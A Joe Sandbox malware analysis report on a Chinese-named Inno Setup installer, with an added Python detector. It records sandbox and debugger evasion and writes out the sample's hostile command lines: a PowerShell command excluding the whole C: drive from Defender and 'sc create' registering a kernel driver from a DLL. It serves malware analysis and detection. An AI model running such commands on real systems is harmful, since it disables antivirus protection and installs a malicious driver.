Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: System information queried: FirmwareTableInformation (raw SMBIOS/ACPI tables, which carry hypervisor vendor strings)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Thread delayed: delay time: 922337203685477 (Int64.MaxValue expressed in milliseconds instead of 100 ns units, i.e. an effectively infinite wait)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 6956
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 2804
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Window / User API: threadDelayed 590
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Window / User API: threadDelayed 591
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Window / User API: threadDelayed 573
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\update.vbc
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\update.vbc
Source: C:\Program Files (x86)\Windows NT\7zr.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe :: API coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5544 :: Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe :: Last function: Thread delayed (30 identical entries)
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Code function: 6_2_6CC2E090 FindFirstFileA,FindClose,FindClose, 6_2_6CC2E090
Source: C:\Program Files (x86)\Windows NT\7zr.exe :: Code function: 10_2_006D6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_006D6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe :: Code function: 10_2_006D7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_006D7496
Source: C:\Program Files (x86)\Windows NT\7zr.exe :: Code function: 10_2_006D9C60 GetSystemInfo, 10_2_006D9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Thread delayed: delay time: 922337203685477
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000002.1822805498.000000000106D000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000002.1822805498.000000000106D000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000002.1822805498.000000000106D000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Code function: 6_2_6CAB3886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6CAB3886 (ThreadInformationClass 0x11 = ThreadHideFromDebugger)
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Thread information set: HideFromDebugger (2 entries)
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Process queried: DebugPort (NtQueryInformationProcess ProcessDebugPort check)
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Code function: 6_2_6CC43871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6CC43871
Source: C:\Program Files (x86)\Windows NT\7zr.exe :: Code function: 10_2_007557D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_007557D0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Code function: 6_2_6CC4D456 mov eax, dword ptr fs:[00000030h] 6_2_6CC4D456 (reads the PEB via fs:[0x30] on 32-bit Windows)
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Code function: 6_2_6CC4D425 mov eax, dword ptr fs:[00000030h] 6_2_6CC4D425
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Code function: 6_2_6CC4286D mov eax, dword ptr fs:[00000030h] 6_2_6CC4286D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Code function: 6_2_6CC3C3AD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6CC3C3AD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" (excludes the whole system drive from Defender scanning; listed twice on the page)
Source: tProtect.dll.12.dr :: Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Process created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe :: Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto (registers an auto-start kernel-mode driver service whose image is a .dll under Program Files (x86), not a .sys in System32\drivers)
Source: C:\Windows\System32\cmd.exe :: Process created: C:\Windows\System32\sc.exe sc start CleverSoar (30 identical entries)
Source: C:\Windows\System32\cmd.exe :: Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp :: Code function: 6_2_6CD0A700 cpuid 6_2_6CD0A700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe :: Code function: 10_2_006DAB2A GetSystemTimeAsFileTime, 10_2_006DAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe :: Code function: 10_2_00770090 GetVersion, 10_2_00770090
Source: C:\Windows\System32\sc.exe :: WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct (2 entries)
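The three process-creation events in this section that a SOC would want as detections are the Defender exclusion for the drive root, the kernel-mode service registered from a .dll under Program Files (x86), and the burst of thirty "sc start" retries. The following Python is an added example written for this page; it is not part of the Joe Sandbox report and not the sample's or any vendor's code. It parses process-creation command lines (fields modelled on Sysmon Event ID 1) and flags those three patterns. The events are constructed to reproduce the command lines listed above; the two benign controls (a hypothetical acmedrv driver in System32\drivers and a C:\Dev\build exclusion) are invented for contrast. It generalises slightly beyond what the page shows: it also recognises -ExclusionProcess and -ExclusionExtension, and file-system (type= filesys) drivers.

```python
"""Detection logic for the defence-evasion chain in this report (added example, constructed input).

Three rules run over process-creation events:
  1. Add-MpPreference exclusions that cover a drive root or a top-level folder
  2. 'sc create ... type= kernel' whose binPath is not a .sys in the driver directory
  3. a burst of 'sc start <name>' for the same service name
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # Sysmon Event ID 1 ParentImage
    image: str          # Sysmon Event ID 1 Image
    command_line: str   # Sysmon Event ID 1 CommandLine


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SC = r"C:\Windows\System32\sc.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed sample events reproducing the report's command lines, plus two
# hypothetical benign controls (acmedrv, C:\Dev\build) that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp", PS,
              "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""),
    ProcEvent(CMD, SC, "sc create CleverSoar displayname= CleverSoar binPath= "
                       "\"C:\\Program Files (x86)\\Windows NT\\tProtect.dll\" type= kernel start= auto"),
    *[ProcEvent(CMD, SC, "sc start CleverSoar") for _ in range(30)],
    ProcEvent(CMD, SC, "sc create acmedrv binPath= \"C:\\Windows\\System32\\drivers\\acmedrv.sys\" "
                       "type= kernel start= demand"),                      # hypothetical benign
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\Dev\\build'\""),  # hypothetical benign
]

# Exclusion value may be single-quoted (inside a -Command string), double-quoted, or bare.
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))", re.I)
SC_CMD_RE = re.compile(r'^\s*"?sc(?:\.exe)?"?\s+(create|start)\s+(\S+)\s*(.*)$', re.I)
SC_PAIR_RE = re.compile(r'(\w+)=\s*(?:"([^"]*)"|(\S+))')   # sc.exe 'key= value' syntax
DRIVER_DIR = r"c:\windows\system32\drivers"


def defender_exclusion(cmdline):
    """Return (kind, value, broad) for an Add-MpPreference exclusion, else None.
    A path exclusion is 'broad' when it is a drive root or a top-level directory:
    everything beneath it is then invisible to Defender."""
    m = EXCLUSION_RE.search(cmdline)
    if not m:
        return None
    kind = m.group(1).lower()
    value = next((g for g in m.groups()[1:] if g), "")
    if kind != "path":
        return kind, value, False
    parts = [p for p in value.rstrip("\\").split("\\") if p]
    return kind, value, bool(value) and len(parts) <= 2


def sc_command(cmdline):
    """Parse 'sc create|start <name> key= value ...' into (verb, name, params)."""
    m = SC_CMD_RE.match(cmdline)
    if not m:
        return None
    verb, name, rest = m.group(1).lower(), m.group(2), m.group(3)
    params = {k.lower(): (q or u) for k, q, u in SC_PAIR_RE.findall(rest)}
    return verb, name, params


def kernel_service_findings(name, params):
    """Reasons a kernel/file-system service registration looks like a rogue driver
    install. The directory check is the weaker signal; the extension check is strong."""
    if params.get("type", "").lower() not in ("kernel", "filesys"):
        return []
    binpath = params.get("binpath", "").strip('"').lower()
    reasons = []
    if not binpath.endswith(".sys"):
        reasons.append("kernel service '%s' binPath is not a .sys image: %s" % (name, binpath))
    if not binpath.startswith(DRIVER_DIR):
        reasons.append("kernel service '%s' binPath is outside %s" % (name, DRIVER_DIR))
    return reasons


def analyze(events, start_burst=5):
    """Run all three rules over a list of ProcEvent and return finding strings."""
    findings, starts = [], Counter()
    for ev in events:
        excl = defender_exclusion(ev.command_line)
        if excl and excl[2]:
            findings.append("broad Defender %s exclusion '%s' added by %s" % (excl[0], excl[1], ev.parent_image))
        sc = sc_command(ev.command_line)
        if sc and sc[0] == "create":
            findings.extend(kernel_service_findings(sc[1], sc[2]))
        elif sc and sc[0] == "start":
            starts[sc[1]] += 1
    for name, n in starts.items():
        if n >= start_burst:
            findings.append("'sc start %s' issued %d times (retry loop)" % (name, n))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Run it as a script to print the findings for the constructed events, or build ProcEvent records from an EDR or Sysmon export and pass them to analyze(). On the events above it yields four findings: the drive-root exclusion, two reasons for the CleverSoar registration, and the thirty-start burst; the two benign controls produce none. Treat the "outside System32\drivers" reason as corroborating rather than decisive, since some legitimately signed drivers do load from vendor directories.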
MITRE ATT&CK Matrix (techniques matched by this analysis, grouped by tactic; the number in parentheses is the count badge shown beside the technique on the page; matrix cells with no match are omitted)

Execution: Windows Management Instrumentation (1); Command and Scripting Interpreter (2); Service Execution (1); Native API (1)
Persistence: Windows Service (1); DLL Side-Loading (1)
Privilege Escalation: Access Token Manipulation (1); Windows Service (1); Process Injection (111); DLL Side-Loading (1)
Defense Evasion: Masquerading (11); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (231); Access Token Manipulation (1); Process Injection (111); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (1); DLL Side-Loading (1)
Discovery: System Time Discovery (1); Security Software Discovery (431); Virtualization/Sandbox Evasion (231); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (2); File and Directory Discovery (3); System Information Discovery (25)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (1)
Impact: System Shutdown/Reboot (1)
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration: no technique matched
Behavior Graph

Behavior Graph ID: 1580553
Sample: #U5b89#U88c5#U7a0b#U5e8f_1....
Startdate: 25/12/2024
Architecture: WINDOWS
Score: 96

Signatures on the sample:

  • Multi AV Scanner detection for dropped file
  • Multi AV Scanner detection for submitted file
  • Found driver which could be used to inject code into processes
  • 3 other signatures

Process tree (dropped files and signatures are listed under the process that produced them):

  • #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
    dropped: C:\...\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, PE32
    • #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
      dropped: C:\Users\user\AppData\Local\...\update.vbc, PE32
      dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
      signature: Adds a directory exclusion to Windows Defender
      • #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
        dropped: C:\...\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, PE32
        • #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
          dropped: C:\Users\user\AppData\Local\...\update.vbc, PE32
          dropped: C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32
          dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+
          dropped: C:\Program Files (x86)\Windows NT\7zr.exe, PE32
          signature: Query firmware table information (likely to detect VMs)
          signature: Protects its processes via BreakOnTermination flag
          signature: Hides threads from debuggers
          signature: Contains functionality to hide a thread from the debugger
          • 7zr.exe
            dropped: C:\Program Files (x86)\...\tProtect.dll, PE32+
            • conhost.exe
          • 7zr.exe
            • conhost.exe
      • powershell.exe
        signature: Loading BitLocker PowerShell Module
        • conhost.exe
        • WmiPrvSE.exe
  • cmd.exe
    • sc.exe
      • 2 other processes
  • cmd.exe
    • sc.exe
      • conhost.exe
  • 30 other processes
    • sc.exe
      • conhost.exe
    • sc.exe
      • conhost.exe
    • sc.exe
      • conhost.exe
    • 26 other processes
      • conhost.exe
      • 25 other processes

Initial Sample

Source | Detection | Scanner | Label | Link
#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | 5% | ReversingLabs | Win32.Ransomware.Generic |
#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | 11% | Virustotal | | Browse
Dropped Files

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | Virustotal | | Browse
C:\Program Files (x86)\Windows NT\hrsw.vbc | 26% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\hrsw.vbc | 38% | Virustotal | | Browse
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\tProtect.dll | 6% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp | 1% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\update.vbc | 26% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\update.vbc | 26% | ReversingLabs | |
No Antivirus matches
No contacted domains info
URLs

Name | Source | Malicious | Antivirus Detection | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | false | | high
https://www.remobjects.com/ps | #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713175306.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713528874.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000000.1714927397.0000000000591000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000000.1806584062.0000000000C5D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.dr | false | | high
https://www.innosetup.com/ | #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713175306.0000000002EE0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe, 00000000.00000003.1713528874.000000007F08B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000000.1714927397.0000000000591000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000006.00000000.1806584062.0000000000C5D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.0.dr, #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp.5.dr | false | | high
        No contacted IP infos
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1580553
        Start date and time:2024-12-25 04:42:22 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 50s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Run name:Run with higher sleep bypass
        Number of new started processes analysed:109
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Critical Process Termination
        Sample name:#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe
        renamed because original name is a hash value
        Original Sample Name:_1.1.6.exe
        Detection:MAL
        Classification:mal96.evad.winEXE@131/31@0/0
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 74%
        • Number of executed functions: 121
        • Number of non-executed functions: 103
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
        • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe
        • Excluded IPs from analysis (whitelisted): 20.12.23.50
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes were analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size exceeded maximum capacity and may have missing disassembly code.
        • Report size getting too big, too many NtCreateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        No simulations
        No context
Dropped Files (Joe Sandbox View)

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.3.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe | Get hash | malicious | Unknown | Browse |
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.4.exe | Get hash | malicious | Unknown | Browse |
                          Process:C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp
                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):831200
                          Entropy (8bit):6.671005303304742
                          Encrypted:false
                          SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                          MD5:84DC4B92D860E8AEA55D12B1E87EA108
                          SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                          SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                          SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                          Malicious:false
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 0%
                          • Antivirus: Virustotal, Detection: 0%, Browse
                          Joe Sandbox View:
